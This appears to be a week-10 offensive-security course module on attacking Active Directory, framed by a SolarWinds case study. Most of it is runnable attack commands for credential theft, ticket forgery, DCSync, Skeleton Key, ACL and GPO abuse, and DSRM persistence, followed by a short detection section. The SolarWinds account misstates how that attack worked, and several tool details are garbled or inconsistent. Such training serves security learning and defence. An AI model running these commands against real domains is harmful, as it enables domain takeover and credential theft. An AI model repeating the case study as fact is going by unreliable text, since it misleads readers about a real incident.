Week 10: Active Directory Attacks

MITRE ATT&CK: Tactic — TA0008 (Lateral Movement), TA0004 (Privilege Escalation), Technique — T1558 (Steal or Forge Kerberos Tickets)

Real-World Attack Scenario: The SolarWinds Supply Chain Attack (2020)

The SolarWinds attack is the most sophisticated AD attack in history:

1. Initial Access: Compromised SolarWinds build server; injected malware into Orion update
2. Persistence via Update: 18,000 customers downloaded infected update
3. AD Enumeration: On first victim (FireEye), used BloodHound to map AD permissions
4. Kerberos Attacks: Used Golden Ticket with stolen krbtgt hash
5. Lateral Movement: Moved from Orion server to Azure AD/Exchange
6. Cloud Pivot: Used compromised AD to access Microsoft 365 cloud services
7. Golden Ticket Lifetime: Maintained access for 8+ months using forged Kerberos tickets

AD attack techniques used in SolarWinds:

• Golden Ticket (TGT forged with stolen krbtgt hash)
• Silver Ticket (TGS forged for specific services)
• DCSync (mimicked domain controller replication)
• SAML token forgery (cloud identity attack)

Attack chain visualization:

Infected Update → FireEye Red Team machine → BloodHound enum
→ Golden Ticket with krbtgt hash → Azure AD/Exchange
→ SAML token forgery → 18,000 downstream customers

Why this week matters: 95% of Fortune 500 companies use Active Directory. Compromising AD means owning the entire network. SolarWinds showed that even organizations with mature security can be owned through AD attack chains.

Objectives

• Understand Active Directory architecture and components
• Master Kerberos attacks (AS-REP, Kerberoast, Golden/Silver tickets)
• Perform BloodHound enumeration and analysis
• Execute domain privilege escalation and persistence

AD Architecture Fundamentals

Core Components

Domain Controller (DC):  LDAP, Kerberos, DNS, SMB, Replication
Forest:                   Collection of domains with shared schema
Domain:                   Logical grouping of users/computers
Organizational Unit (OU):  Container for organizing resources
Trust:                     Relationships between domains/forests

Authentication Protocols

NTLM:     Challenge-response, weaker, legacy
Kerberos: Ticket-based, timestamp-based, preferred

Kerberos Flow

1. Client → KDC (AS):    AS-REQ (who am I, I want TGT)
2. KDC → Client:         AS-REP (TGT + session key, encrypted with user's hash)
3. Client → KDC (TGS):   TGS-REQ (I want to access service X)
4. KDC → Client:         TGS-REP (service ticket, encrypted with service hash)
5. Client → Server:       AP-REQ (service ticket + authenticator)
6. Server → Client:      AP-REP (optional, mutual auth)

Initial Enumeration

LDAPS and SAMR Enum

# enum4linux
enum4linux -a 10.0.0.5

# rpcclient
rpcclient -U "" 10.0.0.5
> enumdomusers
> enumdomgroups
> querydominfo
> getdompwinfo

# Lookupsid (brute force SIDs)
python3 lookupsid.py DOMAIN/username:password@10.0.0.5

# windapsearch (Go)
windapsearch --dc 10.0.0.5 -u DOMAIN\\username -p password --enum-users
windapsearch --dc 10.0.0.5 -u DOMAIN\\username -p password --enum-groups
windapsearch --dc 10.0.0.5 -u DOMAIN\\username -p password --enum-computers

BloodHound (Critical Tool)

# Install
pip3 install bloodhound
# Or use ingestor.py from https://github.com/BloodHoundAD/BloodHound

# Run ingestor (from Kali to target domain)
python3 bloodhound.py -c All -u username@DOMAIN -p password -d DOMAIN -dc 10.0.0.5

# Or with credentials only (no domain join needed)
python3 bloodhound.py -c All -u username -p password -d DOMAIN -dc 10.0.0.5

# Collect with Sharphound (if you have shell on Windows)
# Upload Sharphound.ps1
.Sharphound.ps1 -CollectionMethods All -Domain DOMAIN -DomainController 10.0.0.5

# Use Neo4j + BloodHound GUI
# Analyze paths to Domain Admin

Kerberos Attacks

AS-REP Roasting (Pre-Auth Disabled)

# Find users with Do not require Kerberos pre-authentication
# In BloodHound: Custom Query
# Find accounts where UF_DONT_REQUIRE_PREAUTH is set

# Using GetNPUsers.py (impacket)
python3 GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat -outputfile hashes.txt
python3 GetNPUsers.py DOMAIN/username -request -outputfile hash.txt

# Crack with hashcat
hashcat -m 18200 hashes.txt wordlist.txt
# Or john
john hashes.txt --wordlist=wordlist.txt

# The hash is an AS-REP encrypted with user's password hash
# If cracked, gives user's password

Kerberoasting (Service Accounts)

# Request TGS for service accounts
python3 GetUserSPNs.py DOMAIN/username:password -outputfile spn_hashes.txt
python3 GetUserSPNs.py DOMAIN/username:password -request -request-user targetuser

# Crack with hashcat
hashcat -m 13100 spn_hashes.txt wordlist.txt

# Or Rubeus
.\Rubeus.exe kerberoast /domain:DOMAIN /outfile:hashes.txt

# Goal: Get service account password (often weak, sometimes privileged)

Golden Ticket (TGT forged)

# Requires: krbtgt hash
# Get krbtgt hash via secretsdump on DC
python3 secretsdump.py DOMAIN/username:password@10.0.0.5

# Create golden ticket with Mimikatz (on any domain-joined or non-joined machine)
mimikatz # kerberos::golden /domain:DOMAIN /sid:S-1-5-21-xxx /krbtgt:<ntlm_hash> /user:Administrator /ticket:golden.kirbi

# Or with ticketer.py
python3 ticketer.py -domain DOMAIN -domain-sid S-1-5-21-xxx -nthash <krbtgt_hash> -user-id 500 administrator

# Use ticket
mimikatz # kerberos::ppt golden.kirbi
mimikatz # ls \\DC\c$

Silver Ticket (TGS forged)

# Requires: service account hash (NTLM)
# Forges service ticket directly (no DC needed)

mimikatz # kerberos::silver /domain:DOMAIN /sid:S-1-5-21-xxx /target:DC.DOMAIN /service:cifs /rc4:<service_hash> /user:Administrator

# CIFS service = file access
# HOST = RPCR
# HTTP = WinRM/WebDAV

# Less detected than golden (accessing specific service)

Skeleton Key (DC malware)

# In Mimikatz on DC
mimikatz # privilege::debug
mimikatz # misc::skeleton
# Now you can access any account with password "mimikat"

# Access: net use \\DC\c$ /user:Administrator mimikatz

DC Sync (DCSync)

# Mimikatz on any domain-joined machine with necessary rights
mimikatz # privilege::debug
mimikatz # lsadump::dcsync /domain:DOMAIN /user:krbtgt
mimikatz # lsadump::dcsync /domain:DOMAIN /user:Administrator
mimikatz # lsadump::dcsync /domain:DOMAIN /all

# Or with secretsdump
python3 secretsdump.py DOMAIN/username:password@10.0.0.5

# This mimics DC replication, pulls all hashes from NTDS.dit

Domain Privilege Escalation

Common Priv-Esc Paths

1. User with SeEnableDelegationPrivilege → RBCD attack
2. Service accounts (SPN) → Kerberoast
3. Pre-auth disabled users → AS-REP roast
4. Generic All on object → Writeable GPO
5. Writeable DFSM
6. DNS Admins group → DC code execution

Resource-Based Constrained Delegation (RBCD)

# If you have SeEnableDelegationPrivilege or GenericAll on target
# Can make any machine trust another machine for delegation

# From Linux
python3 rbcd.py DOMAIN/attacker:password -k -t TARGET_COMPUTER -a ATTACKING_COMPUTER

# Then getST as attacking computer to impersonate user on target
python3 getST.py -spn cifs/TARGET_COMPUTER -impersonate Administrator DOMAIN/ATTACKING_COMPUTER\$

ACL Attacks

# Find interesting ACLs with BloodHound
# Path: User → HasPermissions → Group → MemberOf → Domain Admins

# WriteDACL on user object → Add yourself to group
# WriteDACL on group → Add yourself as member
# WriteOwner on group → Take ownership

# Using PowerView
Add-ObjectACL -TargetIdentity "TargetGroup" -PrincipalIdentity attacker -Rights ResetPassword
Add-ObjectACL -TargetIdentity "TargetGroup" -PrincipalIdentity attacker -Rights "WriteMembers"

# Or via LDAP with ldapdomaindump

GPO Abuse

# If you have rights to modify GPO
# Create immediate scheduled task
New-GPOImmediateTask -GPOName "Vulnerable GPO" -TaskName "EvilTask" -Command "powershell.exe -enc BASE64..."

# Or edit GPO manually
# Computer Configuration → Windows Settings → Scripts → Startup
# Or Scheduled Task

# Deliver via SYSVOL
\\DOMAIN\SYSVOL\DOMAIN\Policies\{GPO_GUID}\Machine\Scripts\Startup\

# Tools
SharpGPOAbuse.exe

Domain Persistence

Golden Ticket (Long-term)

# Already covered - persists until krbtgt password changed
# Default: never, or until DC promotion
# Password change interval: typically never

SID History

# Add additional SIDs to user's SID history
# Mimikatz
misc::setsid /sam:targetuser /sid:512  # 512 = Domain Admins

Skeleton Key (DC)

# Already covered - enables password "mimikatz" on all accounts

DSRM Admin

# DSRM password stored locally on each DC
# Once obtained, can use to access DC locally

# Dump DSRM hash
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam

# Modify registry to allow DSRM to be used remotely
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2

# Now access DC with DSRM hash

Defensive Tools & Detection

Detection

# Event ID 4768 (TGT requested) - watch for anomalous
# Event ID 4769 (TGS requested) - look for service accounts
# Event ID 4624 - account logon
# Event ID 4672 - special privileges assigned

# Monitor for:
# - AS-REP requests from non-DC sources
# - Kerberoasting (4769 without corresponding 4768)
# - Golden ticket (user logon with unusual lifetime or RID 502)
# - DCSync (replication operations from non-DC)

Tool: kekeo

# From Benjamin DELPY
# Advanced Kerberos operations

Practice Labs

Lab 1: Kerberoast

# Get shell on domain-joined machine
# Enumerate SPNs
python3 GetUserSPNs.py DOMAIN/user:password -dc-ip 10.0.0.5

# Request tickets
python3 GetUserSPNs.py DOMAIN/user:password -request

# Crack
hashcat -m 13100 spn_hash.txt wordlist.txt

Lab 2: BloodHound Analysis

# Run collector
python3 bloodhound.py -c All -u user@DOMAIN -p password

# Open BloodHound GUI
# Run queries:
# - Shortest path to Domain Admins
# - Find Kerberoastable users
# - Find AS-REP roastable users
# - Find users with GetChangesAll privilege

Lab 3: Golden Ticket

# Get krbtgt hash via DCSync or secretsdump on DC
# Create ticket
mimikatz # kerberos::golden /domain:DOMAIN /sid:S-1-5-21-xxx /krbtgt:HASH /user:fakeadmin /ticket:golden.kirbi

# Use ticket
kerberos::ppt golden.kirbi
# Now access as fakeadmin

Key Takeaways

1. Kerberos — understand TGT/TGS flow; all attacks exploit this
2. Kerberoasting — request TGS for service accounts, crack offline
3. AS-REP roasting — users without pre-auth can be cracked
4. Golden/Silver tickets — forge tickets with stolen hashes
5. BloodHound — graph your AD permissions; find attack paths
6. DCSync — pull all hashes from DC like another DC would

Next Week Preview

Week 11 covers Red Team Operations — advanced persistent threat simulation, C2 frameworks, lateral movement chains, and avoiding detection.